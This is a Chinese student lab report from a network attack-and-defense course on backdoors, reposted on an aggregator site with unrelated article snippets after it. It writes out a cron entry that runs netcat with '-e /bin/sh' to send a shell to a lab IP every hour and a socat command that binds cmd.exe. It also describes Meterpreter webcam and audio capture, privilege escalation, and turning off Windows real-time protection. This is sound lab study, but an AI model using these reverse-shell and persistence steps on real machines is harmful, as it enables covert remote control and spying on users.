20232410 2025-2026-1 《网络与系统攻防技术》实验二实验报告

news/2025/10/20 21:26:56/文章来源:https://www.cnblogs.com/stitchyyy/p/19153702

20232410  2025-2026-1 《网络与系统攻防技术》实验二实验报告
一、实验内容
image

回答问题:
(1)例举你能想到的一个后门进入到你系统中的可能方式?
比如某些钓鱼邮件或者钓鱼网站,携带着一些捆绑着后门程序的exe文件。若点击运行就有可能被植入后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows:通过schtasks命令创建定时任务,指定后门在特定时间自动执行。
Linux:通过某些工具将后门代码注入到系统常驻进程中,借助合法进程的启动来激活。
(3)Meterpreter有哪些给你映像深刻的功能?
可以远程控制摄像头拍照并且记录电脑音频,让我措不及防。
(4)如何发现自己有系统有没有被安装后门? 
可以通过任务管理器查看 CPU 占用异常的进程或者使用杀毒软件扫描。
二、实验过程
2.1 使用netcat获取主机操作Shell,cron启动任务
在Windows中运行nc开始监听2410端口
image

监听状态
image

kali反弹连接Windows,提供自己的shell
image

连接成功,主机获得虚拟机的shell
image

使用cron定时启动任务,在cron表的末尾添加命令50 * * * * /bin/netcat 172.20.10.3 2410 -e /bin/sh,使得在每小时的50分时都交出本机的shell控制权。
image
image

在50分后,主机得到控制权
image

2.2 使用socat获取主机操作Shell,任务计划启动
在Windows下,打开:控制面板->管理工具->任务计划程序,新建任务计划。选择启动的程序为socat.exe,输入参数 tcp-listen:2410 exec:cmd.exe,pty,stderr,任务调整为锁屏后启动,kali终端启动监听。结果如下
image

2.3 使用MSF meterpreter生成可执行文件(后门),传送到主机并运行获取主机Shell
Meterpreter是Metasploit框架中一款功能强大的后渗透攻击载荷,它支持文件操作、屏幕截图、键盘记录等功能。
image

将后门文件传给本机,这里使用了共享文件。先挂载共享文件夹,创建挂载点,再传输文件
image
image

进入msf控制台进行配置
image
image

得到了shell
image

2.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

继续调用指令,继续录音拍照等操作
image

调用摄像头权限如图:
image

尝试提权
image

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取到反弹连接Shell
使用命令生成以pwn20232410a为模板的shellcode文件20232410_pwn
image

输入指令msfconsole,进入msf命令行,操作同上,然后运行文件
image

得出结果
image

三、问题及解决
1.在获取摄像头权限时,系统安全中心预警,强制删除了后门文件。
解决:关闭系统安全中心的实时保护:
image

并且实时保护一段时间后会自动开启,需要小心。

2.后门文件在使用ncat传输到主机上时无法打开,且发现文件大小与原文件不一致。
解决:使用共享文件的方法。创建一个主机与kali之间共享的文件,通过这个文件来传输
image

3.在执行exploit指令时出现错误:
image

显示session1关闭。
解决:参考了毕同学的方法
image

四、心得体会

这次有关后门原理与实践的实验让我对后门的攻击操作有了更深刻的认识。我初步了解了netcat,socat与MSF meterpreter的原理与实际操作。整个实验过程中我也遇到了许多问题,包括防火墙调整,权限控制,传输工具选择与版本兼容。但在同学的经验总结与帮助下都得到了总结,让我受益颇多。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/941617.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SQLite简单使用

SQLite的简单使用记录创建数据库创建完成简单使用先进行一个链接一个表 一个视图创建表 输入表明创建列后面的就跟MySQL大差不差了创建完之后点击OK点击这个可以查看SQL语句

Adaptive Learning Rate(自适应学习率) - -一叶知秋

Adaptive Learning Rate(自适应学习率) Adaptive Learning Rate(自适应学习率) 是指在模型训练过程中,学习率会根据参数更新的反馈自动调整,而不是使用一个固定值。其核心思想是: 👉 不同参数或不同训练阶段,…

新学期每日总结(第12天)

今日 相较昨日 学习了继承与多态

17 线程的创建

17 线程的创建进程 进程:一个程序的运行过程 线程:组成这个程序的并行的模块 一个进程可以包含多个线程。 线程的创建继承Thread类 实现Runnable接口 实现Callable接口1.继承Thread类 继承Thread类,重写run()方法,…

2025.10.20总结 - A

今天满课,感觉挺充实的,加油。

一般公共预算收入 + 全国政府性基金收入

一、税收增速意外创出新高 9月,一般公共预算收入(+2.6%),温和回升0.6个百分点,其中税收(+8.7%)显著回升5.3个百分点,增速创2023年7月以来新高;非税(-11.4%)受去年同期大幅征收、基数走高的影响跌幅扩大。支…

从C10K到Reactor:事件驱动,如何重塑高并发服务器的网络架构

从C10K到Reactor:事件驱动,如何重塑高并发服务器的网络架构事件驱动 事件驱动(Event Driven)是一种核心的编程范式,其根本特征是控制反转(Inversion of Control,IoC)。在这种模型中,程序的执行流不再由代码的…

类欧几里德算法

引入 Floor Sum 令 \(f(a,b,c,n)=\displaystyle \sum_{i=0}^{n}\lfloor\dfrac{a\times i+b}{c}\rfloor\)。我们要求的就是这个东西。 考虑如果 \(a,b\) 中有一个比 \(c\) 大。那么有: \[f(a,b,c,n)=\sum_{i=0}^{n}\lf…

AI助力可再生能源系统优化研究

本文介绍了研究者如何利用人工智能技术解决能源供应挑战,重点探讨了大语言模型在数值数据分析、风能评估和齿轮箱功率损失预测中的应用,以及将AI扩展到太阳能和水电等可再生能源领域的未来计划。使用AI应对能源供应挑…

结对项目:小学四则运算题目生成器

结对项目:小学四则运算题目生成器这个项目属于哪个课程 课程链接作业要求 作业链接作业的目标 结对编程实现一个自动生成小学四则运算题目的命令行程序学号姓名 3223004816王韵清,3223004820曾钰仪Github链接 Github…

数据范围

废话不多讲,直接给图:(注意:不同版本的c++程序,数据范围可能有所改动!!!)

CF2107E Ain and Apple Tree

拆贡献拆到每个点就是 \(C_{siz}^2\)。 根据世界沉睡童话的结论,我们很大概率能用这种不同的 \(siz\) 组合出很多数,打个表发现都能组合出来,然后依次挂在一条链上就做完了(因为叶子没有贡献)。

2025,为什么公众号编辑器排版决定阅读完成率?——一次从流程到结果的深评

在2025,公众号编辑器选型里,我更关心的不是“功能堆满没”,而是“能否把创作从起笔到发布,做成省心、稳定、可复制的流程”。 这篇测评以“知识类自媒体”常见稿型为样本,完整跑通“选题→结构→AI排版→多平台分…

P14262 [ROI 2015 Day1] 自动好友

P14262 [ROI 2015 Day1] 自动好友 题解题目传送门 我的博客-欢迎光顾 写了一个很另类的容斥。。。比其他dalao的做法复杂不少(为了方便描述,如果 \(i,j\) 是一对潜在好友,我们就称 \((i,j)\) 是一对朋友对) (以下…

傻瓜式处理kauditd0病毒程序记录

服务器莫名奇妙很慢,top指令查看,有个kauditd0进程导致cpu占用很高,自己或者网上尝试了各种方式,都要死灰复燃,最终打算删除启动程序的账号es,这个账号并非我正在使用发账号,直接deluser删除也会有进程占用不让…

win10 升级 win11 后时间更新失败

可能的原因:时间服务器设置问题 设置路径:设置 \(\to\) 时间和语言 \(\to\) 日期和时间 \(\to\) 更改时间服务器可选授时服务器:cn.pool.ntp.org Windows Time 服务问题 若步骤 1 同步失败,可能是 Windows Time 服…

软件工程学习日志2025.10.20

今日概览统一了全站顶部导航的视觉样式,移除各页面导航按钮的 primary 高亮,确保颜色一致与信息层级清晰。 修正了个人中心页的导航,移除指向当前页的“个人中心”按钮,避免自指链接。 启动并验证了本地服务,通过…

P14254 分割(树上计数问题) 题解

P14254 树上组合计数(分割问题)题解 原题链接 一、题目分析 这部分是解题的核心,通过分析条件得出简化问题的关键结论。计数问题先尝试找一下性质:注意到节点的选择只能越来越深 \[d_i>=d_1 \]最关键性质: \[m…

完整教程:开源 C++ QT QML 开发(一)基本介绍

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …